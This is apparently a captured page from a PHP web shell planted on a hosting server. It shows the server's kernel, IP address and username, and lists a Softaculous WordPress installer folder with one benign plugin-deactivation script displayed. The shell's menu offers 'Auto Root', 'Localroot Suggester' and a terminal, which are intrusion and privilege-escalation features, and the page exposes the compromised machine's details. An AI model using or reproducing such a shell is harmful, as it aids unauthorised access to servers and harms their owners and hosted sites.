Linux ams-business-8.hostwindsdns.com 4.18.0-553.80.1.lve.el8.x86_64 #1 SMP Wed Oct 22 19:29:36 UTC 2025 x86_64
LiteSpeed
Server IP : 192.236.177.161 & Your IP : 216.73.216.154
Domains :
Cant Read [ /etc/named.conf ]
User : ajzdfbpz
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
wp63 /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2025-10-04 10:14
languages
[ DIR ]
drwxr-xr-x
2025-10-04 10:14
php53
[ DIR ]
drwxr-xr-x
2025-10-04 10:14
php56
[ DIR ]
drwxr-xr-x
2025-10-04 10:14
php71
[ DIR ]
drwxr-xr-x
2025-10-04 10:14
php81
[ DIR ]
drwxr-xr-x
2025-10-04 10:14
php82
[ DIR ]
drwxr-xr-x
2025-10-04 10:14
plugins
[ DIR ]
drwxr-xr-x
2025-10-04 10:14
.htaccess
482
B
-rw-r--r--
2023-11-08 16:01
_htaccess
553
B
-rw-r--r--
2023-11-08 16:01
_index.php
59
B
-rw-r--r--
2023-11-08 16:01
_wp-config.php
3.08
KB
-rw-r--r--
2023-11-08 16:01
add_user.php
461
B
-rw-r--r--
2023-11-08 16:01
backup.php
3.03
KB
-rw-r--r--
2025-10-03 15:52
check_charset.php
2.02
KB
-rw-r--r--
2023-11-08 16:01
clone.php
31
KB
-rw-r--r--
2025-10-03 15:52
clone.xml
497
B
-rw-r--r--
2023-11-08 16:01
edit.php
9.45
KB
-rw-r--r--
2025-10-03 15:52
edit.xml
1.76
KB
-rw-r--r--
2023-11-08 16:01
extend.php
82.76
KB
-rw-r--r--
2025-10-03 15:52
fileindex.php
291
B
-rw-r--r--
2023-11-08 16:01
import.php
6.54
KB
-rw-r--r--
2025-10-03 15:52
info.xml
14.91
KB
-rw-r--r--
2025-10-03 09:17
install.js
1.46
KB
-rw-r--r--
2025-01-03 16:25
install.php
31.46
KB
-rw-r--r--
2025-10-03 15:52
install.xml
5.67
KB
-rw-r--r--
2025-02-24 10:15
md5
6.85
KB
-rw-r--r--
2025-10-03 15:52
notes.txt
6.01
KB
-rw-r--r--
2025-10-03 09:17
plugin_activate.php
596
B
-rw-r--r--
2023-11-08 16:01
plugin_deactivate.php
613
B
-rw-r--r--
2023-11-08 16:01
sign_on.php
3.28
KB
-rw-r--r--
2025-01-28 12:20
soft.htaccess
127
B
-rw-r--r--
2023-11-08 16:01
upgrade.php
13.89
KB
-rw-r--r--
2025-10-03 15:52
upgrade.xml
1.62
KB
-rw-r--r--
2023-11-08 16:01
wp-config.php
2.8
KB
-rw-r--r--
2023-11-08 16:01
Save
Rename
<?php @unlink(__FILE__); // Validate if the request is from Softaculous if($_REQUEST['pass'] != '[[autopass]]'){ die("Unauthorized Access"); } require_once('wp-blog-header.php'); require_once('wp-includes/pluggable.php'); require_once('wp-admin/includes/plugin.php'); $plugins_to_deactivate = '[[plugins_to_deactivate]]'; $plugins_to_deactivate = unserialize($plugins_to_deactivate); $ret = array(); foreach($plugins_to_deactivate as $plugn_file){ // null means success $ret[$plugn_file] = deactivate_plugins($plugn_file); } echo '<plugin_deactivate>'.serialize($ret).'</plugin_deactivate>'; exit(0);